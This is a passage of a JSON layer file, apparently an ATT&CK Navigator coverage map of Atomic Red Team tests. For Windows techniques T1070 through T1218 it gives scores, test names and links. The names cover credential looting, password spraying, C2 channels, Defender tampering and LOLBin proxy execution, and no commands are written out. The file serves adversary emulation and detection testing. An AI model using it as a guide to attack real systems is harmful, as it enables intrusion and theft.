Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View 